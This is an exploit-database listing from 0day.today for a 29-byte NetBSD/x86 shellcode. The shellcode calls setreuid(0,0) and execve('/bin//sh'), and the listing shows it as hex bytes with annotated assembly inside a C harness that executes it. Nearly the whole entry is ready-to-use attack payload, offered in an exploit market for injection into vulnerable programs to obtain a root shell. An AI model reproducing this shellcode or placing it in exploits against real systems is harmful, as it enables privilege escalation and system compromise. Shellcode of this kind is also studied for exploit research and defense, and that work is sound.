[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 29 bytes

Author
p. minervini
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-8229
Category
shellcode
Date add
30-11-2005
Platform
netbsd/x86
==================================================================
netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 29 bytes
==================================================================





/*
 *  minervini at neuralnoise dot com (c) 2005
 *  NetBSD/i386 2.0, setreuid(0, 0); execve("/bin//sh", ..., NULL);
 *  note: unsafe shellcode, but 29 bytes long;
 *  	  doesn't work if (eax & 0x40000000) != 0;
 */

#include <sys/types.h>
#include <stdio.h>
#include <string.h>

char scode[] =
  "\x99"                   // cltd   
  "\x52"                   // push   %edx
  "\x52"                   // push   %edx
  "\x52"                   // push   %edx
  "\x6a\x7e"               // push   $0x7e
  "\x58"                   // pop    %eax
  "\xcd\x80"               // int    $0x80
  "\x68\x2f\x2f\x73\x68"   // push   $0x68732f2f
  "\x68\x2f\x62\x69\x6e"   // push   $0x6e69622f
  "\x89\xe3"               // mov    %esp,%ebx
  "\x52"                   // push   %edx
  "\x54"                   // push   %esp
  "\x53"                   // push   %ebx
  "\x52"                   // push   %edx
  "\x34\x3b"               // xor    $0x3b,%al
  "\xcd\x80";              // int    $0x80

int main() {
   void (*code) () = (void *) scode;
   printf("length: %d\n", strlen(scode));
   code();
   return (0);
}



#  0day.today [2024-11-15]  #